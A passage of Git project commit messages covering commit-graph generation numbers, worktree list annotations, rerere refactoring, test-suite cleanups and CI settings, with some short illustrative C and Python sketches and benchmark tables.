commit date for the lower layer but the new layer does not need
any overflow.
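The chunk identifier in the BUG message is four ASCII bytes packed into a 32-bit number. Decoding it shows which chunk the message refers to; the variable names below are only for illustration.

```python
chunk_id = 0x47444F56

# Interpret the number as four big-endian bytes and read them as ASCII.
chunk_name = chunk_id.to_bytes(4, "big").decode("ascii")
```

Here `chunk_name` is "GDOV", the identifier of the generation data overflow chunk.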
Add a test to t5318-commit-graph.sh that demonstrates this bug. However,
it does not trigger consistently with the existing code.
The generation number data is stored in a slab and accessed by
commit_graph_data_at(). This data is initialized when parsing a commit,
but is otherwise used assuming it has been populated. The loop in
compute_generation_numbers() did not enforce that all reachable
commits were parsed and had correct values. This could lead to some
problems when writing a commit-graph with corrected commit dates based
on a commit-graph without them.
It has been difficult to identify the issue here because it was so hard
to reproduce. It relies on this uninitialized data having a non-zero
value, but also specifically in a way that overwrites the existing
data.
This patch adds the extra parse to ensure the data is filled before we
compute the generation number of a commit. This triggers the new test
to fail because the generation number overflow count does not match
between this computation and the write for that chunk.
The actual fix will follow as the next few changes.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The write_commit_graph_context has a repository pointer, so use it.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove a comment at the beginning of remove_redundant() that mentions a
reordering of the input array to have the initial segment be the
independent commits and the final segment be the redundant commits.
While this behavior is followed in remove_redundant(), no callers rely
on that behavior.
Remove the final loop that copies this final segment and update the
comment to match the new behavior.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The test case added by 9466e3809d ("blame: enable funcname blaming with
userdiff driver", 2020-11-01) forgot to quote variable expansions. This
causes failures when the current directory contains blanks.
One variable that the test case introduces will not have IFS characters
and could remain without quotes, but let's quote all expansions for
consistency, not just the one that has the path name.
Signed-off-by: Johannes Sixt <j6t@kdbg.org>
Acked-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git worktree list" annotates each worktree according to its state such
as "prunable" or "locked", however it is not immediately obvious why
these worktrees are being annotated. For prunable worktrees a reason
is available that is returned by should_prune_worktree() and for locked
worktrees a reason might be available provided by the user via `lock`
command.
Let's teach "git worktree list" a --verbose mode that outputs the reason
why the worktrees are being annotated. The reason is text of virtually
any length, and appending it to the default columned format would make
it difficult to extend the command with other annotations and would
not fit nicely on the screen. To address this shortcoming, the
annotation is moved to the next line, indented, and followed by the reason.
If the reason is not available, the annotation stays on the same line as
the worktree itself.
The output of "git worktree list" with verbose becomes like so:
$ git worktree list --verbose
...
/path/to/locked-no-reason acb124 [branch-a] locked
/path/to/locked-with-reason acc125 [branch-b]
locked: worktree with a locked reason
/path/to/prunable-reason ace127 [branch-d]
prunable: gitdir file points to non-existent location
...
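The layout rule can be sketched as a small formatting function. The `format_entry()` helper is hypothetical, column alignment is ignored, and the use of a tab for the indentation is an assumption.

```python
def format_entry(path, head, branch, annotation=None, reason=None):
    """Format one worktree line the way the verbose mode is described."""
    line = f"{path} {head} [{branch}]"
    if annotation is None:
        return line
    if reason:
        # With a reason: annotation moves to its own indented line.
        return f"{line}\n\t{annotation}: {reason}"
    # Without a reason: annotation stays on the worktree's line.
    return f"{line} {annotation}"
```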
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "git worktree list" command shows the absolute path to the worktree,
the commit that is checked out, the name of the branch, and a "locked"
annotation if the worktree is locked, however, it does not indicate
whether the worktree is prunable.
The "prune" command will remove a worktree if it is prunable unless
`--dry-run` option is specified. This could lead to a worktree being
removed without the user realizing before it is too late, in case the
user forgets to pass --dry-run for instance. If the "list" command shows
which worktree is prunable, the user could verify before running
"git worktree prune" and hopefully prevent the working tree from being
removed "accidentally" in the worst-case scenario.
Let's teach "git worktree list" to show when a worktree is a prunable
candidate for both default and porcelain format.
In the default format a "prunable" text is appended:
$ git worktree list
/path/to/main aba123 [main]
/path/to/linked 123abc [branch-a]
/path/to/prunable ace127 (detached HEAD) prunable
In the --porcelain format a prunable label is added followed by
its reason:
$ git worktree list --porcelain
...
worktree /path/to/prunable
HEAD abc1234abc1234abc1234abc1234abc1234abc12
detached
prunable gitdir file points to non-existent location
...
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit c57b3367be (worktree: teach `list` to annotate locked worktree,
2020-10-11) taught "git worktree list" to annotate locked worktrees by
appending "locked" text to its output, however, this is not listed in
the --porcelain format.
Teach "list --porcelain" to do the same and add a "locked" attribute
followed by its reason, thus making both default and porcelain format
consistent. If the locked reason is not available then only "locked"
is shown.
The output of the "git worktree list --porcelain" becomes like so:
$ git worktree list --porcelain
...
worktree /path/to/locked
HEAD 123abcdea123abcd123acbd123acbda123abcd12
detached
locked
worktree /path/to/locked-with-reason
HEAD abc123abc123abc123abc123abc123abc123abc1
detached
locked reason why it is locked
...
In porcelain mode, if the lock reason contains special characters
such as newlines, they are escaped with backslashes and the entire
reason is enclosed in double quotes. For example:
$ git worktree list --porcelain
...
locked "worktree's path mounted in\nremovable device"
...
Furthermore, let's update the documentation to state that some
attributes in the porcelain format might be listed alone or together
with their value, depending on whether the value is available. This
documents the case of the new "locked" attribute.
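As a rough illustration of the quoting rule described above (not the
actual implementation), the sketch below formats a "locked" line into a
buffer. The names toy_append() and toy_format_locked() are hypothetical,
and the set of characters treated as special (newline, double quote,
backslash) is an assumption made for the example.

```c
#include <stddef.h>
#include <string.h>

/* Append s to buf without overflowing a buffer of size len. */
static void toy_append(char *buf, size_t len, const char *s)
{
	size_t used = strlen(buf);

	if (used + 1 < len)
		strncat(buf, s, len - used - 1);
}

/*
 * Hypothetical helper: write "locked", "locked <reason>", or
 * "locked "<escaped reason>"" into buf. Assumption: only newline,
 * double quote and backslash count as special characters here.
 */
void toy_format_locked(char *buf, size_t len, const char *reason)
{
	if (!len)
		return;
	buf[0] = '\0';
	toy_append(buf, len, "locked");
	if (!reason || !*reason)
		return; /* no reason available: the attribute is listed alone */
	toy_append(buf, len, " ");
	if (!strpbrk(reason, "\n\"\\")) {
		toy_append(buf, len, reason); /* nothing special: print as-is */
		return;
	}
	toy_append(buf, len, "\"");
	for (; *reason; reason++) {
		char plain[2] = { *reason, '\0' };

		switch (*reason) {
		case '\n': toy_append(buf, len, "\\n"); break;
		case '"':  toy_append(buf, len, "\\\""); break;
		case '\\': toy_append(buf, len, "\\\\"); break;
		default:   toy_append(buf, len, plain); break;
		}
	}
	toy_append(buf, len, "\"");
}
```

A reason without special characters is emitted verbatim, while one
containing a newline comes out as a single double-quoted line, so a
script reading the porcelain output can keep parsing line by line.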
Helped-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
c57b3367be (worktree: teach `list` to annotate locked worktree,
2020-10-11) introduced a new test to ensure locked worktrees are listed
with "locked" annotation. However, the test does not clean up after
itself as "git worktree prune" is not going to remove the locked worktree
in the first place. This not only leaves the test in an unclean state,
but also potentially breaks following tests that rely on the
"git worktree list" output.
Let's fix that by unlocking the worktree before the "prune" command.
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
worktree_lock_reason() aborts with an assertion failure when called on
the main worktree since locking the main worktree is nonsensical. Not
only is this behavior undocumented, thus callers might not even be aware
that the call could potentially crash the program, but it also forces
clients to be extra careful:
if (!is_main_worktree(wt) && worktree_lock_reason(...))
...
Since we know that locking makes no sense in the context of the main
worktree, we can simply return false for the main worktree, thus making
client code less complex by eliminating the need for the callers to have
inside knowledge about the implementation:
if (worktree_lock_reason(...))
...
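A minimal sketch of the idea, using a simplified stand-in for the real
structure: `struct toy_worktree` and toy_lock_reason() are hypothetical
names, and the fields are assumptions chosen only to show the early
return for the main worktree.

```c
#include <stddef.h>

/* Hypothetical, simplified stand-in for a worktree record. */
struct toy_worktree {
	int is_main;             /* non-zero for the main worktree */
	const char *lock_reason; /* NULL when the worktree is not locked */
};

/*
 * Return the lock reason, or NULL if the worktree is not locked.
 * The main worktree can never be locked, so report "not locked"
 * for it instead of aborting on an assertion.
 */
const char *toy_lock_reason(const struct toy_worktree *wt)
{
	if (wt->is_main)
		return NULL;
	return wt->lock_reason;
}
```

With this shape, a caller can test the return value directly without
first checking which kind of worktree it holds.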
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add worktree_prune_reason() to allow a caller to discover whether a
worktree is prunable and the reason that it is, much like
worktree_lock_reason() indicates whether a worktree is locked and the
reason for the lock. As with worktree_lock_reason(), retrieve the
prunable reason lazily and cache it in the `worktree` structure.
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As part of teaching "git worktree list" to annotate worktrees that are
candidates for pruning, let's move should_prune_worktree() from
builtin/worktree.c to worktree.c in order to make it part of the
worktree public API.
should_prune_worktree() knows how to select the given worktree for
pruning based on an expiration date, however the expiration value is
stored in a static file-scope variable and it is not local to the
function. In order to move the function, teach should_prune_worktree()
to take the expiration date as an argument and document the new
parameter that is not immediately obvious.
Also, change the function comment to clearly state that the worktree's
path is returned in `wtpath` argument.
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Using "1~5" isn't portable. Nobody seems to have noticed, since perhaps
people don't tend to run the perf suite on more exotic platforms. Still,
it's better to set a good example.
We can use:
perl -ne 'print if $. % 5 == 1'
instead. But we can further observe that perl does a good job of the
other parts of this pipeline, and fold the whole thing together.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Right now, the test suite can be run with 'GIT_TEST_WRITE_REV_INDEX=1'
in the environment, which causes all operations which write a pack to
also write a .rev file.
To prepare for when that eventually becomes the default, we should
continue to test the in-memory reverse index, too, in order to avoid
losing existing coverage. Unfortunately, explicit existing coverage is
rather sparse, so only a basic test is added that compares the result of
git rev-list --objects --no-object-names --all |
git cat-file --batch-check='%(objectsize:disk) %(objectname)'
with and without an on-disk reverse index.
Suggested-by: Jeff King <peff@peff.net>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we expand a user-format, we try to avoid work that isn't necessary
for the output. For instance, we don't bother parsing the commit header
until we know we need the author, subject, etc.
But we do always load the commit object's contents from disk, even if
the format doesn't require it (e.g., just "%H"). Traditionally this
didn't matter much, because we'd have loaded it as part of the traversal
anyway, and we'd typically have those bytes attached to the commit
struct (or these days, cached in a commit-slab).
But when we have a commit-graph, we might easily get to the point of
pretty-printing a commit without ever having looked at the actual object
contents. We should push off that load (and reencoding) until we're
certain that it's needed.
I think the results of p4205 show the advantage pretty clearly (we serve
parent and tree oids out of the commit struct itself, so they benefit as
well):
# using git.git as the test repo
Test                          HEAD^               HEAD
----------------------------------------------------------------------
4205.1: log with %H           0.40(0.39+0.01)     0.03(0.02+0.01) -92.5%
4205.2: log with %h           0.45(0.44+0.01)     0.09(0.09+0.00) -80.0%
4205.3: log with %T           0.40(0.39+0.00)     0.04(0.04+0.00) -90.0%
4205.4: log with %t           0.46(0.46+0.00)     0.09(0.08+0.01) -80.4%
4205.5: log with %P           0.39(0.39+0.00)     0.03(0.03+0.00) -92.3%
4205.6: log with %p           0.46(0.46+0.00)     0.10(0.09+0.00) -78.3%
4205.7: log with %h-%h-%h     0.52(0.51+0.01)     0.15(0.14+0.00) -71.2%
4205.8: log with %an-%ae-%s   0.42(0.41+0.00)     0.42(0.41+0.01) +0.0%
# using linux.git as the test repo
Test                          HEAD^               HEAD
----------------------------------------------------------------------
4205.1: log with %H           7.12(6.97+0.14)     0.76(0.65+0.11) -89.3%
4205.2: log with %h           7.35(7.19+0.16)     1.30(1.19+0.11) -82.3%
4205.3: log with %T           7.58(7.42+0.15)     1.02(0.94+0.08) -86.5%
4205.4: log with %t           8.05(7.89+0.15)     1.55(1.41+0.13) -80.7%
4205.5: log with %P           7.12(7.01+0.10)     0.76(0.69+0.07) -89.3%
4205.6: log with %p           7.38(7.27+0.10)     1.32(1.20+0.12) -82.1%
4205.7: log with %h-%h-%h     7.81(7.67+0.13)     1.79(1.67+0.12) -77.1%
4205.8: log with %an-%ae-%s   7.90(7.74+0.15)     7.81(7.66+0.15) -1.1%
I added the final test to show where we don't improve (the 1% there is
just lucky noise), but also as a regression test to make sure we're not
doing anything stupid like loading the commit multiple times when there
are several placeholders that need it.
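To make the deferred load concrete, here is a toy sketch rather than
the real pretty-printing code. `struct toy_commit`, toy_subject() and
toy_format() are hypothetical; the "loads" counter stands in for reading
the object from disk, and only the %H and %s placeholders are handled.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical commit record for illustration only. */
struct toy_commit {
	const char *oid_hex; /* known without reading the object body */
	const char *subject; /* stands in for data that needs the body */
	int loads;           /* how many times the body was "loaded" */
	int loaded;          /* non-zero once the body is cached */
};

/* Pretend to read the object; only happens on the first request. */
static const char *toy_subject(struct toy_commit *c)
{
	if (!c->loaded) {
		c->loaded = 1;
		c->loads++;
	}
	return c->subject;
}

/* Expand %H and %s into buf; other characters are copied literally. */
void toy_format(struct toy_commit *c, const char *fmt, char *buf, size_t len)
{
	size_t used = 0;

	if (!len)
		return;
	buf[0] = '\0';
	while (*fmt && used + 1 < len) {
		char lit[2] = { *fmt, '\0' };
		const char *piece;

		if (fmt[0] == '%' && fmt[1] == 'H') {
			piece = c->oid_hex; /* no load needed */
			fmt += 2;
		} else if (fmt[0] == '%' && fmt[1] == 's') {
			piece = toy_subject(c); /* load lazily, at most once */
			fmt += 2;
		} else {
			piece = lit;
			fmt++;
		}
		used += snprintf(buf + used, len - used, "%s", piece);
	}
}
```

Formatting with only "%H" leaves the load counter at zero, and a format
that uses "%s" several times bumps it exactly once, which mirrors the
two things the final perf test is meant to guard.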
Reported-by: Michael Haggerty <mhagger@alum.mit.edu>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 6e98de72c0 (sequencer (rebase -i): add support for the 'fixup' and
'squash' commands, 2017-01-02), this developer introduced a change of
behavior by mistake: when encountering a `fixup!` commit (or multiple
`fixup!` commits) without any `squash!` commit thrown in, the final `git
commit` was invoked with `--cleanup=strip`. Prior to that commit, the
commit command had been called without that `--cleanup` option.
Since we explicitly read the original commit message from a file in that
case, there is really no sense in forcing that clean-up.
We actually need to actively suppress that clean-up lest a configured
`commit.cleanup` may interfere with what we want to do: leave the commit
message unchanged.
Reported-by: Vojtěch Knyttl <vojtech@knyt.tl>
Helped-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we use the sub-test helpers, we end up defining one shell snippet
inside another shell snippet. So if we use single-quotes for the outer
snippet, we have to use double-quotes within the inner snippet (it's
included as here-doc within the outer snippet, but using a single quote
would end the outer snippet early). Or vice versa we can use double
quotes for the outer snippet, but then single quotes in the inner.
We have some of each in the script, and neither is wrong. But it would
be nice to be consistent unless there is a good reason not to. Using
single quotes for the outer script is preferable, because it requires
less metacharacter quoting overall. For example, in:
test_expect_success 'outer' '
run_sub_test_lib_test ... <<-\EOF
echo $foo &&
test_expect_success "inner" "
echo \$bar
"
EOF
'
we need only quote inside "inner", but not inside "outer" or the
here-doc. Whereas if we flip them, we have to quote in both places:
test_expect_success 'outer' "
run_sub_test_lib_test ... <<-\EOF
echo \$foo &&
test_expect_success 'inner' '
echo \$bar
'
EOF
"
The exception is when we need a literal single-quote in an expected
output here-doc. There we can either use outer double-quotes, or just
use ${SQ} within the doc. I chose the latter for consistency (within
this test, but also with other test scripts that face the same problem).
There is one other interesting case, which is some tests that do:
test_expect_success ... "
do_something --run='"'!3'"'
"
This is rather confusing to read, but is correct. The outer script sees
'!3' in single-quotes, as does the eval'd snippet. This is perhaps being
overly cautious. In many interactive shells, an exclamation triggers
history expansion even inside double quotes, but that is not generally
true in non-interactive shells.
There's some conflicting information here. Commit 784ce03d55 (t4216:
avoid unnecessary subshell in test_bloom_filters_not_used, 2020-05-19)
reports it as a problem with OpenBSD 6.7's /bin/sh. However, we have
many instances in this script of prereqs like !LAZY_TRUE, which haven't
been a problem. I left them un-escaped here to test out this theory.
It's much nicer if we can not worry about this as a portability issue,
so it's worth knowing.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our check of test_when_finished is done directly in the main script, and
if we failed to clean, we complain and exit immediately. It's nicer to
signal a test failure here, for a few reasons:
- this gives better output to the user when run under a TAP harness
like "prove"
- consistency; it's the only test left in the file that behaves this way
- half of its "if" conditional is nonsense anyway; it picked up a
reference to GIT_TEST_FAIL_PREREQS_INTERNAL in dfe1a17df9 (tests:
add a special setup where prerequisites fail, 2019-05-13) along with
its neighbors, even though it has nothing to do with that flag
We could actually do this without a sub-test at all, and just put our
two tests (one to do cleanup, and one to check that it happened) in the
main script. But doing it in a subtest is conceptually cleaner (from the
perspective of the main test script, we are checking only one thing),
and it remains consistent with the "cleanup when failing" test directly
after it, which has to happen in a sub-test (to avoid the main script
complaining of the failed test).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We test the behavior of prerequisites in t0000 by setting up fake ones
in the main test script, trying to run some tests, and then seeing if
those tests impacted the environment correctly. If they didn't, then we
write a message and manually call exit.
Instead, let's push these down into a sub-test, like many of the other
tests covering the framework itself. This has a few advantages:
- it does not pollute the test output with mention of skipped tests
(that we know are uninteresting -- the point of the test was to see
that these are skipped).
- when running in a TAP harness, we get a useful test failure message
(whereas when the script exits early, a tool like "prove" simply
says "Dubious, test returned 1").
- we do not have to worry about different test environments, such as
when GIT_TEST_FAIL_PREREQS_INTERNAL is set. Our sub-test helpers
already give us a known environment.
- the tests themselves are a bit easier to read, as we can just check
the test-framework output to see what happened (and get the usual
test_cmp diff if it failed)
A few notes on the implementation:
- we could do one sub-test per each individual test_expect_success. I
broke it up here into a few logical groups, as I think this makes it
more readable
- the original tests modified environment variables inside the test
bodies. Instead, I've used "true" as the body of a test we expect to
run and "false" otherwise. Technically this does not confirm that
the body of the "true" test actually ran. We are trusting the
framework output to believe that it truly ran, which is sufficient
for these tests. And I think the end result is much simpler to
follow.
- the nested_prereq test uses a few bare "test -f" calls; I converted
these to our usual test_path_is_* helpers while moving the code
around.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We check that test_when_finished cleans up after a test, and that it
runs even after a failure. Those two were originally adjacent, but got
split apart by the new test added in 477dcaddb6 (tests: do not let lazy
prereqs inside `test_expect_*` turn off tracing, 2020-03-26), and then
further by more lazy-prereq tests. Let's move them back together.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we are looking up an oid in an array, we obviously don't need to
write to the array. Let's mark it as const in the function interfaces,
as well as in the local variables we use to dereference the void pointer
(note a few cases use pointers-to-pointers, so we mark everything
const).
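For illustration, a const-correct lookup might look like the sketch
below. `struct toy_oid`, TOY_RAWSZ and toy_oid_pos() are hypothetical
names, the 4-byte hash size is an assumption to keep the example small,
and the "-1 - insertion point" return convention is likewise chosen just
for the sketch.

```c
#include <stddef.h>
#include <string.h>

#define TOY_RAWSZ 4 /* assumption: tiny hash size for illustration */

struct toy_oid {
	unsigned char hash[TOY_RAWSZ];
};

/*
 * Binary-search a sorted table of ids. Return the index if found,
 * or (-1 - insertion point) if not. Neither the key nor the table
 * is written to, so both are const in the interface.
 */
int toy_oid_pos(const struct toy_oid *key,
		const struct toy_oid *table, size_t nr)
{
	size_t lo = 0, hi = nr;

	while (lo < hi) {
		size_t mi = lo + (hi - lo) / 2;
		int cmp = memcmp(key->hash, table[mi].hash, TOY_RAWSZ);

		if (!cmp)
			return (int)mi;
		if (cmp < 0)
			hi = mi;
		else
			lo = mi + 1;
	}
	return -1 - (int)lo;
}
```

Marking the table const lets callers pass read-only data without a
cast, and the compiler will flag any accidental write in the lookup.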
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
All of our callers are actually looking up an object_id, not a bare
hash. Likewise, the arrays they are looking in are actual arrays of
object_id (not just raw bytes of hashes, as we might find in a pack
.idx; those are handled by bsearch_hash()).
Using an object_id gives us more type safety, and makes the callers
slightly shorter. It also gets rid of the word "sha1" from several
access functions, though we could obviously also rename those with
s/sha1/hash/.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We store a struct for each directory we access under .git/rr-cache. The
structs are kept in an array sorted by the binary hash associated with
their name (and we do lookups with a binary search).
This works OK, but there are a few small downsides:
- the amount of code isn't huge, but it's more than we'd need using one
of our other stock data structures
- the insertion into a sorted array is quadratic (though in practice
it's unlikely anybody has enough conflicts for this to matter)
- it's intimately tied to the representation of an object hash. This
isn't a big deal, as the conflict ids we generate use the same hash,
but it produces a few awkward bits (e.g., we are the only user of
hash_pos() that is not using object_id).
Let's instead just treat the directory names as strings, and store them
in a strmap. This is less code, and removes the use of hash_pos().
Insertion is now non-quadratic, though we probably use a bit more
memory. Besides the hash table overhead, and storing hex bytes instead
of a binary hash, we actually store each name twice. Other code expects
to access the name of a rerere_dir struct from the struct itself, so we
need a copy there. But strmap keeps its own copy of the name, as well.
Using a bare hashmap instead of strmap means we could use the name for
both, but at the cost of extra code (e.g., our own comparison function).
Likewise, strmap has a feature to use a pointer to the in-struct name at
the cost of a little extra code. I didn't do either here, as simple code
seemed more important than squeezing out a few bytes of efficiency.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We check only that get_sha1_hex() doesn't complain, which means we'd
match an all-hex name with trailing cruft after it. This probably
doesn't matter much in practice, since there shouldn't be anything else
in the rr-cache directory, but it could possibly cause us to mix up sha1
and sha256 entries (which also shouldn't be intermingled, but could be
leftovers from a repository conversion).
Note that "get_sha1_hex()" is a confusing historical name. It is
actually using the_hash_algo, so it would be sha256 in a sha256 repo.
We'll switch to using parse_oid_hex(), because that conveniently
advances our pointer. But it also gets rid of the sha1 name. Arguably
it's a little funny to use "object_id" here for something that isn't
actually naming an object, but it's unlikely to be a problem (and is
contained in a single function).
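The difference between "the parser did not complain" and "the whole
name is hex" can be sketched as follows. toy_parse_hex() and
toy_is_rr_cache_name() are hypothetical helpers, not Git functions; the
first mimics a parser that advances an end pointer, which is what makes
the trailing-cruft check a one-liner.

```c
#include <stddef.h>

static int toy_hexval(char c)
{
	if (c >= '0' && c <= '9')
		return c - '0';
	if (c >= 'a' && c <= 'f')
		return c - 'a' + 10;
	if (c >= 'A' && c <= 'F')
		return c - 'A' + 10;
	return -1; /* also covers the terminating NUL */
}

/*
 * Parse exactly hexsz hex digits from name. On success, point *end
 * at the first unparsed character and return 0; otherwise return -1.
 */
int toy_parse_hex(const char *name, size_t hexsz, const char **end)
{
	size_t i;

	for (i = 0; i < hexsz; i++)
		if (toy_hexval(name[i]) < 0)
			return -1;
	*end = name + hexsz;
	return 0;
}

/* A plausible directory name is all hex with nothing after it. */
int toy_is_rr_cache_name(const char *name, size_t hexsz)
{
	const char *end;

	return !toy_parse_hex(name, hexsz, &end) && !*end;
}
```

Checking only the parser's return value would accept "0123abcdXYZ" for
an 8-digit hash; the extra `!*end` test is what rejects it.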
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In rerere_gc(), we walk over the .git/rr-cache directory and create a
struct for each entry we find. We feed any name we get from readdir() to
find_rerere_dir(), which then calls get_sha1_hex() on it (since we use
the binary hash as a lookup key). If that fails (i.e., the directory
name is not what we expected), it returns NULL. But the comment in
find_rerere_dir() says "BUG".
It _would_ be a bug for the call from new_rerere_id_hex(), the only
other code path, to fail here; it's generating the hex internally. But
the call in rerere_gc() is using it to say "is this a plausible
directory name".
Let's instead have rerere_gc() do its own "is this plausible" check.
That has two benefits:
- we can now reliably BUG() inside find_rerere_dir(), which would
catch bugs in the other code path (and we now will never return NULL
from the function, which makes it easier to see that a rerere_id
struct will always have a non-NULL "collection" field).
- it makes the use of the binary hash an implementation detail of
find_rerere_dir(), not known by callers. That will free us up to
change it in a future patch.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
All of our callers have an object_id, and are just dereferencing the
hash field to pass to us. Let's take the actual object_id instead. We
still access the hash to pass to hash_pos, but it's a step in the right
direction.
This makes the callers slightly simpler, but also gets rid of the
untyped pointer, as well as the now-inaccurate name "sha1".
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix a bug in upload-pack.c that occurs when you combine partial
clone and uploadpack.packObjectsHook. You can reproduce it as
follows:
git clone -u 'git -c uploadpack.allowfilter '\
'-c uploadpack.packobjectshook=env '\
'upload-pack' --filter=blob:none --no-local \
src.git dst.git
Be careful with the line endings because this has a long quoted
string as the -u argument.
The error I get when I run this is:
Cloning into '/tmp/broken'...
remote: fatal: invalid filter-spec ''blob:none''
error: git upload-pack: git-pack-objects died with error.
fatal: git upload-pack: aborting due to possible repository corruption on the remote side.
remote: aborting due to possible repository corruption on the remote side.
fatal: early EOF
fatal: index-pack failed
The problem is caused by unneeded quoting.
This bug was already present in 10ac85c785 (upload-pack: add object
filtering for partial clone, 2017-12-08) when the server side filter
support was introduced. In fact, in 10ac85c785 this was broken
regardless of uploadpack.packObjectsHook. Then in 0b6069fe0a
(fetch-pack: test support excluding large blobs, 2017-12-08) the
quoting was removed but only behind a conditional that depends on
whether uploadpack.packObjectsHook is set.
Because uploadpack.packObjectsHook is apparently rarely used, nobody
noticed the problematic quoting could still happen.
Remove the conditional quoting and add a test for partial clone in
t5544-pack-objects-hook.
Signed-off-by: Jacob Vosmaer <jacob@gitlab.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We allow variadic macros in the code base, but only if there is fallback
code for platforms that lack it. This leads to some annoyances:
- the code is more complicated because of the fallbacks (e.g.,
trace_printf(), etc, is implemented twice with a set of parallel
wrappers).
- some constructs are just impossible and we've had to live without
them (e.g., a cross between FLEX_ALLOC and xstrfmt)
Since this feature is present in C99, we may be able to start counting
on it being available everywhere. Let's start with a weather balloon
patch to find out.
This patch makes the absolute minimal change by always setting
HAVE_VARIADIC_MACROS. If somebody runs into a platform where it's a
problem, they can undo it by commenting out the define. Likewise, if we
have to revert this, it would be quite unlikely to cause conflicts.
Once we feel comfortable that this is the right direction, then we can
start ripping out all the spots that actually look at the flag, and
removing the dead code.
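As a reminder of what the feature buys us, here is a small sketch (not
code from this patch). toy_trace_fl() and the toy_trace() macro are
hypothetical names; the macro uses C99 __VA_ARGS__ to forward the
caller's file and line along with a printf-style message.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Function form: format "<file>:<line>: <message>" into buf.
 * Returns the number of characters that the full result needs,
 * or a negative value on a formatting error.
 */
int toy_trace_fl(char *buf, size_t len, const char *file, int line,
		 const char *fmt, ...)
{
	va_list ap;
	int n, m;

	n = snprintf(buf, len, "%s:%d: ", file, line);
	if (n < 0 || (size_t)n >= len)
		return n; /* error, or no room left for the message */
	va_start(ap, fmt);
	m = vsnprintf(buf + n, len - n, fmt, ap);
	va_end(ap);
	return m < 0 ? m : n + m;
}

/* C99 variadic macro: records the call site without extra typing. */
#define toy_trace(buf, len, ...) \
	toy_trace_fl(buf, len, __FILE__, __LINE__, __VA_ARGS__)
```

Without variadic macros, the call site cannot be captured this way, so
a fallback needs a second set of plain variadic functions that simply
lose the file and line information.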
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The CI/PR GitHub Actions workflow uses the 'matrix' strategy for the
"windows-test", "vs-test", "regular" and "dockerized" jobs. The default
behaviour of GitHub Actions is to cancel all in-progress jobs in a
matrix if one of the jobs in the matrix fails [1].
This is not ideal as a failure early in a job, like during installation of
the build/test dependencies on a specific platform, leads to the
cancellation of all other jobs in the matrix.
Set the 'fail-fast' variable to 'false' for all four matrix jobs in the
workflow.
[1] https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstrategyfail-fast
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
